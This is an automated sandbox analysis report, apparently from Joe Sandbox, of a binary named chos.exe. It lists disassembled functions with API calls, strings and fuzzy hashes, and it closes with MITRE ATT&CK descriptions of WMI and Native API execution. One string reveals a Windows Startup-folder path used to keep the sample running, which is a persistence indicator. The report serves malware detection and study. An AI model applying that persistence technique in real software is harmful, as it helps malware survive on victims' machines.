Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 8aa69c65082f5ed190463b1c2d732539134b8ecb86da000f77e4666776fecf75
Instruction ID: 3f4998771c89f757e9f5be1319469ca7797a88645ace77e65735039a69f41b0e
Opcode Fuzzy Hash: 8aa69c65082f5ed190463b1c2d732539134b8ecb86da000f77e4666776fecf75
Instruction Fuzzy Hash: C2110620A0C246C1FB5A7372442917AD1414F8F320FD48735D93E4E2D2FE2DB80252F1

Function 00007FF7FD746010 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7FD74604C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7FD746176
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7FD74622C

Strings

verbose, xrefs: 00007FF7FD746020

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction ID: 683e58b6cb340c334553dd4056f4162c686c792abefa0cc17d81e6ed421acf81
Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction Fuzzy Hash: A791C222A0CA46C1F762AF24D4587BEB291AB4AB54FC44136DA694B3D5FF3CE40583F0

Function 00007FF7FD74FC38 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7FD74FF17

Part of subcall function 00007FF7FD747AAC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FD747AC9

Strings

UTF-8, xrefs: 00007FF7FD74FE96
UTF-16LEUNICODE, xrefs: 00007FF7FD74FEB5
ccs, xrefs: 00007FF7FD74FE52

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
Instruction ID: c8d25b0177c26448e5a0c5595ccbc07dc10317a9e5f391043e39f36bc6271480
Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
Instruction Fuzzy Hash: 1481C532D0C293C6F7666E258118279F6A0AB1B744FD54239DA298F2C9FB2DE50187F1

Function 00007FF7FD73D6B8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF7FD73D6E3
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF7FD73D77A
RtlUnwindEx.KERNEL32 ref: 00007FF7FD73D7D4

Strings

csm, xrefs: 00007FF7FD73D761

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
Instruction ID: eba4ee8b5f5a7b24931c30da6f46b240f4a88bbb665fb4aaff0fbba65ea831b9
Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
Instruction Fuzzy Hash: B651B132B1D6128BDB14AB55D054A78B391EB48B98F944130DA6E4B7C4FFBCE841D7E0

Function 00007FF7FD73EF48 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF7FD73EFA7
_CallSETranslator.LIBVCRUNTIME ref: 00007FF7FD73EFF3

Strings

MOC, xrefs: 00007FF7FD73EFBB
RCC, xrefs: 00007FF7FD73EFC3

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
Instruction ID: d8735e3c51dd2a967c22246ce6b2a907e7652eb8aa1ac63ba6bfce94207f9d4e
Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
Instruction Fuzzy Hash: 0D61723290CBC581D7609B15E4407AAF7A0FB897D4F444225EBAC0BB95EFBCD194CBA0

Function 00007FF7FD73F2F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF7FD73F320
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF7FD73F408

Strings

csm, xrefs: 00007FF7FD73F45A
csm, xrefs: 00007FF7FD73F342

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
Instruction ID: 26c8bff033bd24f74fe6d97d9e4a3a5d657246d0321fd5eaaedfd749c038d9db
Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
Instruction Fuzzy Hash: 9851A03290C38286EB64AE219044368F690EB59BD4F944336EA6C4B7D5EFBCE450D7E1

Function 00007FF7FD732810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00007FF7FD7328EA

Strings

[PYI-%d:%ls] , xrefs: 00007FF7FD732868
Error, xrefs: 00007FF7FD7328DD
ERROR, xrefs: 00007FF7FD73286F

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: Message
String ID: ERROR$Error$[PYI-%d:%ls]
API String ID: 2030045667-255084403
Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
Instruction ID: 850d463ccaac8689ed37ece20fcc279f51355794b21985b0c37eda0a60bf9b13
Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
Instruction Fuzzy Hash: 2C21A362B0CB4182E711AB55F4447EAA364EB8C784F804136EE9D5B695EE3CD245C7E0

Function 00007FF7FD74C610 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF7FD74C68F
WriteFile.KERNEL32 ref: 00007FF7FD74C957
WriteFile.KERNEL32 ref: 00007FF7FD74C99D
GetLastError.KERNEL32 ref: 00007FF7FD74CA53

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
Instruction ID: cfec26cccbea60cde3a930a9adb43e21dc34df75a900275ac8b521717b350a4b
Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
Instruction Fuzzy Hash: 30D1F372B1DA40CAE712DF65D4442AC7761FB49798B848236DE6D5BBC9EE38D006C3E0

Function 00007FF7FD7320C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF7FD7320F4
SetWindowLongPtrW.USER32 ref: 00007FF7FD732116
GetWindowLongPtrW.USER32 ref: 00007FF7FD732140
InvalidateRect.USER32 ref: 00007FF7FD732160

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction ID: 4f55e8ec57861c8dfddc5a351062ba08140092fecbd1feee6d99d581611d7dd1
Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction Fuzzy Hash: 8A11E921E1C14242F754A769E6443799251EB8C780FC48030DF690BBC9ED6DD4C592F1

Function 00007FF7FD73D080 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF7FD73D0AC
GetCurrentThreadId.KERNEL32 ref: 00007FF7FD73D0BA
GetCurrentProcessId.KERNEL32 ref: 00007FF7FD73D0C6
QueryPerformanceCounter.KERNEL32 ref: 00007FF7FD73D0D6

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
Instruction ID: dda6911dd9d3635c892a77aaea4f5d2220e66498a4db16aa2b6ff2450ddced37
Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
Instruction Fuzzy Hash: 26111F26B18B05CAEB00DF60E8553B973A4F71D758F840E31DA6D4A7A4EF78D15483E1

Function 00007FF7FD755B8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7FD7517D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FD751803

_get_daylight.LIBCMT ref: 00007FF7FD755CA4
_get_daylight.LIBCMT ref: 00007FF7FD755CB5

Strings

?, xrefs: 00007FF7FD755C35

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
Instruction ID: 630c935e58a59b131f58f6e9a4e1fb0c4ae88769f06ee03e24de918f89f23cba
Opcode Fuzzy Hash: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
Instruction Fuzzy Hash: AB412916A0C38241FB62AF259445379D660EF89BA4F944236EE7C0EAD5FE3CD441C7E1

Function 00007FF7FD749084 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7FD7490B6

Part of subcall function 00007FF7FD74A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7FD752D92,?,?,?,00007FF7FD752DCF,?,?,00000000,00007FF7FD753295,?,?,?,00007FF7FD7531C7), ref: 00007FF7FD74A9CE
Part of subcall function 00007FF7FD74A9B8: GetLastError.KERNEL32(?,?,?,00007FF7FD752D92,?,?,?,00007FF7FD752DCF,?,?,00000000,00007FF7FD753295,?,?,?,00007FF7FD7531C7), ref: 00007FF7FD74A9D8

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7FD73CC15), ref: 00007FF7FD7490D4

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe, xrefs: 00007FF7FD7490C2

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
API String ID: 3580290477-891251809
Opcode ID: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
Instruction ID: 600db65297ff7a014d001ffa0daa371958d3a035ec6b8a7b7eb952a43e152ab3
Opcode Fuzzy Hash: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
Instruction Fuzzy Hash: 8E418F36A0CB12C5E716BF2594440B8A394EB4E784BD54039EA6D4BBC5EF3CD48183F0

Function 00007FF7FD74CCA8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF7FD74CDBF
GetLastError.KERNEL32 ref: 00007FF7FD74CDE1

Strings

U, xrefs: 00007FF7FD74CD6B

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
Instruction ID: 66bed569caec2af18f4113d5670074a3731b04418d9be5064e3e746642fd612d
Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
Instruction Fuzzy Hash: 27418222B1CA4585DB619F25E4443AAA760FB99794F944032EE5D8B798EF3CD401CBA0

Function 00007FF7FD74F628 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF7FD74F668
GetCurrentDirectoryW.KERNEL32 ref: 00007FF7FD74F6BA

Strings

:, xrefs: 00007FF7FD74F67E

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 779a21297323b81187f7e0c7d27b40be9ec8fbab2d126766b2de98969da868de
Instruction ID: f80ca4dd5518befdfc9d7d55ab5f1e2a44772cca69d68f1ef25b95e7891d838f
Opcode Fuzzy Hash: 779a21297323b81187f7e0c7d27b40be9ec8fbab2d126766b2de98969da868de
Instruction Fuzzy Hash: DB21D422A0C281C1EB21AB11D04827DE3A1FB8DB44FD54135D6AC4B6D4EF7CD54487F2

Function 00007FF7FD73FDB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF7FD73FE08
RaiseException.KERNEL32 ref: 00007FF7FD73FE49

Strings

csm, xrefs: 00007FF7FD73FE36

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
Instruction ID: 6ded1ee3e8200f71042eed4f75c31c53f8ff20eb32ca0daa9659fee0b94fda20
Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
Instruction Fuzzy Hash: DA115E3261CB8582EB209F15F400269F7E0FB8CB84F984234DA9D0B799EF7CD5518B90

Function 00007FF7FD7507AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7FD7507DC
GetDriveTypeW.KERNEL32 ref: 00007FF7FD75081C

Strings

:, xrefs: 00007FF7FD750805

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
Instruction ID: 6bbc86b4870a7bd74aeb48245c2baf5be66cb54b5d1f1fe28599e91b5c6d77c3
Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
Instruction Fuzzy Hash: BB01B12290C20385FB20BF60942637EA2A0EF4C308FC40435D56C4A6C1FE3CE5049AF5

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

